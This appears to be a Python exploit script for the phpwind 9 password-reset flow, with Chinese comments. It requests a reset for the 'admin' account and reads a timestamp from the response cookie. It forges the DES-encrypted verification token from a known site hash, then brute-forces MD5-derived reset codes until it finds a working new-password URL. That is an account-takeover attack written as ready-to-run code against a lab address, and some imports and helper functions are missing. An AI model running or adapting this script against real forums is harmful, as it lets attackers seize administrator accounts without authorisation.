def des_encrypt(s, key): """ DES 加密 :param s: 原始字符串 :return: 加密后字符串,16进制 """ size = 8 iv = md5(key)[-size:] key = key[:size] # pad = size - (len(s)%size) k = des(key, CBC, iv, pad=None, padmode=PAD_PKCS5) en = k.encrypt(s, padmode=PAD_PKCS5) return base64.b64encode(en)
def request(url, username,email): # request for findpwd html = r.get(url+'/index.php?m=u&c=findPwd') data = re.findall(r'(?<=csrf_token" value=")\w+', html.text) csrf_token = data[0] print(csrf_token) header = { 'Cookie': 'csrf_token={0};'.format(csrf_token), } datas = { 'step':'do', 'username':username, 'csrf_token':csrf_token, } # request for checkusername html = r.post(url + '/index.php?m=u&c=findPwd&a=checkUsername', headers=header, data=datas) data = re.findall(r'(?<=csrf_token" value=")\w+', html.text) csrf_token = data[0] # request for findpwd header = { 'Cookie': 'csrf_token={0};'.format(csrf_token), } datas = { 'username':username, 'email':email, 'csrf_token':csrf_token, } html = r.post(url + '/index.php?m=u&c=findPwd&a=dobymail', headers=header, data=datas) if "我们已经发送邮件至您的邮箱" in html.text: print('重置连接发送成功') t = re.findall(r'(?<=lMd_lastvisit=0%09).*(?=%09%2Fphpwind)', str(html.headers))[0] return int(t) elif "邮箱和用户名不匹配" in html.text: print('邮箱和用户名不匹配') return False
if __name__ == '__main__': base_url = "http://10.10.10.134:8080/phpwind9/" username ='admin' email = 'xxxx@qq.com' site_hash = 'TbJlLkai' timestamp = 1 timestamp = request(url=base_url, username=username, email=email) verification = des_encrypt(s=username+"|"+'email'+"|"+email, key=site_hash+'___findpwd') verification = verification.decode('utf-8') for v in verification: if v not in string.digits and v not in string.ascii_letters: verification = verification.replace(v, quote(quote(v, encoding='utf-8'),encoding='utf-8')) print(verification) print(timestamp) print(md5(str(timestamp))) if timestamp: for i in range(0, 8): code = md5(str(timestamp))[i+1:i+9] url = base_url + 'index.php?m=u&c=findPwd&a=resetpwd&code={0}&_statu={1}'.format(code, verification) html = r.get(url) # print(url) if '新密码' in html.text: print(url)